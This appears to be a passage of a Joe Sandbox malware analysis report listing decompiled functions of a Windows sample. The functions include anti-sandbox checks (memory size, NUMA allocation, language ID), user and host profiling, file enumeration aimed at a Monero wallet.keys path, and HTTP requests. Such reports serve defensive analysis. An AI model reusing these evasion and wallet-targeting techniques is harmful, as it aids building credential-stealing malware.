                          • Part of subcall function 00E36770: GetUserDefaultLangID.KERNEL32 ref: 00E36774
                          • Part of subcall function 00E21190: ExitProcess.KERNEL32 ref: 00E211C6
                          • Part of subcall function 00E37850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E211B7), ref: 00E37880
                          • Part of subcall function 00E37850: RtlAllocateHeap.NTDLL(00000000), ref: 00E37887
                          • Part of subcall function 00E37850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E3789F
                          • Part of subcall function 00E378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37910
                          • Part of subcall function 00E378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E37917
                          • Part of subcall function 00E378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E3792F
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E36AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00E36AF9
                        • Sleep.KERNEL32(00001770), ref: 00E36B04
                        • CloseHandle.KERNEL32(?,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36B1A
                        • ExitProcess.KERNEL32 ref: 00E36B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: a5bb6193160e40ee902c480c7129ef953d41677f970da572d70019541d27f068
                        • Instruction ID: a510153ad37d3a4aaa188eba49bda1377556b008bebb11188577bb8441e15921
                        • Opcode Fuzzy Hash: a5bb6193160e40ee902c480c7129ef953d41677f970da572d70019541d27f068
                        • Instruction Fuzzy Hash: 6A314571900218ABDB14F7F0EC5EBEE7BB8AF54340F046568F282B6191DF745A45C7A2
                        Function 00E21220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 e21220-e21247 call e389b0 GlobalMemoryStatusEx 1439 e21273-e2127a 1436->1439 1440 e21249-e21271 call e3da00 * 2 1436->1440 1441 e21281-e21285 1439->1441 1440->1441 1443 e21287 1441->1443 1444 e2129a-e2129d 1441->1444 1446 e21292-e21294 ExitProcess 1443->1446 1447 e21289-e21290 1443->1447 1447->1444 1447->1446
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E2123E
                        • __aulldiv.LIBCMT ref: 00E21258
                        • __aulldiv.LIBCMT ref: 00E21266
                        • ExitProcess.KERNEL32 ref: 00E21294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: e581ff8799953484237cc6263798194adbc5141fb792beab7fa52c91609df94d
                        • Instruction ID: 12c2d31bb9cfb255eaec52ac41c19fc09b8fca255555f8a7c97d1f6b0181b5ae
                        • Opcode Fuzzy Hash: e581ff8799953484237cc6263798194adbc5141fb792beab7fa52c91609df94d
                        • Instruction Fuzzy Hash: 16016DB1D44308FAEB10EBE0ED49B9EBBB8FB14705F209488F705B62D0D77856419799
                        Function 00E36AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 e36af3 1451 e36b0a 1450->1451 1453 e36aba-e36ad7 call e3aad0 OpenEventA 1451->1453 1454 e36b0c-e36b22 call e36920 call e35b10 CloseHandle ExitProcess 1451->1454 1460 e36af5-e36b04 CloseHandle Sleep 1453->1460 1461 e36ad9-e36af1 call e3aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E36AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00E36AF9
                        • Sleep.KERNEL32(00001770), ref: 00E36B04
                        • CloseHandle.KERNEL32(?,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36B1A
                        • ExitProcess.KERNEL32 ref: 00E36B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: a50c6951b0f2c0b796dd1ef0da5f643b862513a89bea260f4416fb8207faf3e2
                        • Instruction ID: 8c76b7985bd14e49f52c28c09beba4ad4bd1e7285a8ed921a90885400d83deff
                        • Opcode Fuzzy Hash: a50c6951b0f2c0b796dd1ef0da5f643b862513a89bea260f4416fb8207faf3e2
                        • Instruction Fuzzy Hash: 6EF03A30A40209FEEB20BBB09C1EBBDBFB4FB04701F10A514F543B6181CBB55540DA55
                        Function 00E247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: e9b242cb94fbc733dee322edbf7c0fb4468673b919325cd2e591cf308ff3ee66
                        • Instruction ID: c88a44fa0a6e3b20c9857db1e8451270d20dbb00de480e42df522cf664ab1aa6
                        • Opcode Fuzzy Hash: e9b242cb94fbc733dee322edbf7c0fb4468673b919325cd2e591cf308ff3ee66
                        • Instruction Fuzzy Hash: A2214FB1D00209ABDF14DFA4E849ADE7BB5FB44320F108625F955B72C0EB746A09CF81
                        Function 00E351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E26280: InternetOpenA.WININET(00E40DFE,00000001,00000000,00000000,00000000), ref: 00E262E1
                          • Part of subcall function 00E26280: StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26303
                          • Part of subcall function 00E26280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E26335
                          • Part of subcall function 00E26280: HttpOpenRequestA.WININET(00000000,GET,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E26385
                          • Part of subcall function 00E26280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E263BF
                          • Part of subcall function 00E26280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E263D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 91c7c1e87393e820e5938c5049629b87cf97acd3804d66e9494567a9970c62f4
                        • Instruction ID: 51201705b3b4c5a38dd53ed8d0bdc0a43d3f7fa6b625d8005395b4b836c84ed0
                        • Opcode Fuzzy Hash: 91c7c1e87393e820e5938c5049629b87cf97acd3804d66e9494567a9970c62f4
                        • Instruction Fuzzy Hash: 46113331910148ABCB18FF64DD9AAED7BB8AF50300F4451A8F84A77192EF306B45C691
                        Function 00E21110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E2112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E21132
                        • ExitProcess.KERNEL32 ref: 00E21143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 94329f304fe8cb404b326370327f47691a95036886e07b4fb717c76558982000
                        • Instruction ID: 3ca84a70ce7bf99813c5be0ccad83b7082757ff8b4d18eac1e6dd441a1e6b8d0
                        • Opcode Fuzzy Hash: 94329f304fe8cb404b326370327f47691a95036886e07b4fb717c76558982000
                        • Instruction Fuzzy Hash: 76E0E670A45308FFE7207BA0AC0AF0976B8AB04B05F105095F709771D4D6B926409799
                        Function 00E210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E210B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E210F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c0c89f757cb3d553bff01fc850b90dd438513d101ca93329d0760ce63f0b2c25
                        • Instruction ID: 18ba0bbbce401c61d324b55fa0e26ca2331d6f51e6aee72c45b023a10f7aab7b
                        • Opcode Fuzzy Hash: c0c89f757cb3d553bff01fc850b90dd438513d101ca93329d0760ce63f0b2c25
                        • Instruction Fuzzy Hash: 9EF0E271641318BBE714AAA4AC49FABB7E8E705B15F302448F544F3280D572AF00CBA0
                        Function 00E21190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37910
                          • Part of subcall function 00E378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E37917
                          • Part of subcall function 00E378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E3792F
                          • Part of subcall function 00E37850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E211B7), ref: 00E37880
                          • Part of subcall function 00E37850: RtlAllocateHeap.NTDLL(00000000), ref: 00E37887
                          • Part of subcall function 00E37850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E3789F
                        • ExitProcess.KERNEL32 ref: 00E211C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: d9f5d5b86cc9641ac56240f37dce94cc2b1ef3380d6de2014fded8860ab13c9e
                        • Instruction ID: cdb6c5e3579a8898c77c6f3fe25591272e2ae433b8a385a72f739d18f092e208
                        • Opcode Fuzzy Hash: d9f5d5b86cc9641ac56240f37dce94cc2b1ef3380d6de2014fded8860ab13c9e
                        • Instruction Fuzzy Hash: E4E012B5A1431997CA2473B4BD0EB2A3ADC5B64349F042425FA85F3112FA6AF910C665

                        Non-executed Functions

                        Function 00E338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00E338CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E338E3
                        • lstrcat.KERNEL32(?,?), ref: 00E33935
                        • StrCmpCA.SHLWAPI(?,00E40F70), ref: 00E33947
                        • StrCmpCA.SHLWAPI(?,00E40F74), ref: 00E3395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E33C67
                        • FindClose.KERNEL32(000000FF), ref: 00E33C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: dfdac2a981e829b533f1a08b9277a24ab650931578cf6437ce0eaaef26a2204e
                        • Instruction ID: 827269d76c567fabc69bb9a12abdc5781a10d348fa25061016160dd67b24bd17
                        • Opcode Fuzzy Hash: dfdac2a981e829b533f1a08b9277a24ab650931578cf6437ce0eaaef26a2204e
                        • Instruction Fuzzy Hash: A2A130B1A002189BDB34EB64DC89FEA77B8BB88300F045598F64DA7145EB759B84CF61
                        Function 00E2BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00E40B32,00E40B2B,00000000,?,?,?,00E413F4,00E40B2A), ref: 00E2BEF5
                        • StrCmpCA.SHLWAPI(?,00E413F8), ref: 00E2BF4D
                        • StrCmpCA.SHLWAPI(?,00E413FC), ref: 00E2BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2C7BF
                        • FindClose.KERNEL32(000000FF), ref: 00E2C7D1
                        Strings
                        Memory Dump Source
